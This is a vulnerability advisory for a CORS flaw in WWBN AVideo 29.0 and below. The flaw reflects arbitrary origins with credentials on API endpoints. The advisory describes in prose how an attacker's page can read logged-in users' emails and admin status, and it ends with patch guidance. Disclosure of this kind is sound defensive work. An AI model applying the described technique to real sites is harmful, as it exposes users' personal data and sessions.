WWBN AVideo Cross-Origin Resource Sharing Vulnerability Allowing Data Theft

A Cross-Origin Resource Sharing (CORS) vulnerability has been identified in WWBN AVideo versions 29.0 and below. The issue arises from an incomplete CORS origin validation fix, which allows arbitrary 'Origin' headers to be reflected with credentials for all '/api/*' endpoints. This vulnerability enables attackers to make cross-origin credentialed requests and access authenticated responses containing personal user information, such as email, admin status, and session-sensitive data.

Impact

Exploitation of this vulnerability allows for unauthorized cross-origin requests that include the victim's session cookies, bypassing the intended CORS protections. This could lead to unauthorized access to sensitive user data through the API, including personal information and administrative privileges.

Reproduction

To reproduce this vulnerability, an attacker must host a webpage on a domain they control. This page should include a script that sends a cross-origin request to the target AVideo site's API user endpoint, using credentials. When a logged-in user visits the attacker's page, the browser will send the request with the user's session cookies, allowing the attacker to access the response containing sensitive user information.

Remediation

Users can update to the patched version of AVideo, which includes the CORS vulnerability fix. Instructions for updating can be found in the AVideo documentation.